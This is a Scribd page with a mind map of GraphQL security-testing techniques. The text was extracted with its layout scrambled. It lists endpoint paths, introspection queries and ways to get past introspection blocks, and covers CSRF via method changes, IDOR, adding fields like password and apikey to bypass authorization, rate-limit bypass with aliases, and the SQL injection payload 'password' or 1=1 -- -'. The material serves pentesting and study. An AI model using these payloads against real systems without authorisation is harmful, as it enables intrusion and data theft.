Scribd
Upload
8 views

GraphQL_Security Testing

The document outlines various methods and techniques for testing the security of GraphQL endpoints, including identifying endpoints, using universal queries, and performing introspection. It also discusses potential vulnerabilities such as CSRF, IDORs, and injection attacks, along with strategies for bypassing authorization and rate limits. Additionally, it highlights the importance of understanding GraphQL schemas and the risks of information disclosure in GraphQL applications.

Uploaded by

Arjun Arjun
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
8 views

GraphQL_Security Testing

The document outlines various methods and techniques for testing the security of GraphQL endpoints, including identifying endpoints, using universal queries, and performing introspection. It also discusses potential vulnerabilities such as CSRF, IDORs, and injection attacks, along with strategies for bypassing authorization and rate limits. Additionally, it highlights the importance of understanding GraphQL schemas and the risks of information disclosure in GraphQL applications.

Uploaded by

Arjun Arjun
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 1

@h0tak88r

GraphQL
Security Testing

/graphql
/graphiql
/graphql.php

/graphql/console
Finding GraphQL endpoints /api
GraphQL Schema  /api/graphql

graphw00f - GraphQL Server Fingerprinting  Fingerprint /graphql/api


/graphql/graphql
If you send query{__typename} to any GraphQL endpoint, it will include the string
{"data": {"__typename": "query"}} somewhere in its response. This is known as a
Universal queries
universal query, and is a useful tool in probing whether a URL corresponds to a
query={__schema{types{name,fields{name}}}}
GraphQL service.
query={__schema{types{name,fields{name,args{name,description,type{name,kind,ofType{name, kind}}}}}}}

Obtain GraphQL API schema even if the introspection is If introspection is enabled but the above query doesn't run, try removing the
 onOperation, onFragment, and onField directives from the query structure. Many
disabled via errors
Introspection Full Introspection Query 
endpoints do not accept these directives as part of an introspection query, and you
Detection and building of a GraphQL schema from proxy can often have more success with introspection by removing them

traffic
Inline introspection query: 
GraphQL Wordlist 

Introspection query with newline


Content type changed from application/json ->
{ Change Request Method via Burp two times Create the CSRF POC
GraphQL Without Introspection x-www-form-urlencoded

"query": "query{__schema special character after the __schema keyword


Try to send GET requests instead of POST ones
may bypass the regex of exclude __schema CSRF in GraphQL Change HTTP method 
to get CSRF.
{queryType{name}}}"

For detailed Research about this bug 


}

{
Inspect/Sources/"Search all files"
Use the Sources tab of the developer tools to search all JS files to "operationName":"updateProfile",
file:* mutation
enumerate where the queries are saved. IDORs Change the object reference ( id,username,email,others) to another user's "variables":{"username":INJECT,"data":INJECT},
file:* query
"query":"mutation updateProfile($username: String!,...){updateProfile(username: $username,...){...}}"
}

Try to add more fields like when request query it has just id,name try to add some
Bypass authorization in GraphQL
fields like password,apikey,................
Vulnerabilities
Try to add operation endpoint/operationName with the old one to chaine queries 

Rate limit bypass using aliases 

Denial of service 

SQLi password: "password' or 1=1 -- -"


Injection Attacks
XSS 

Team object in GraphQL disclosed total number



of whitelisted hackers
Information disclosure
Team object exposes amount of participants in

a private program to non-invited users

You might also like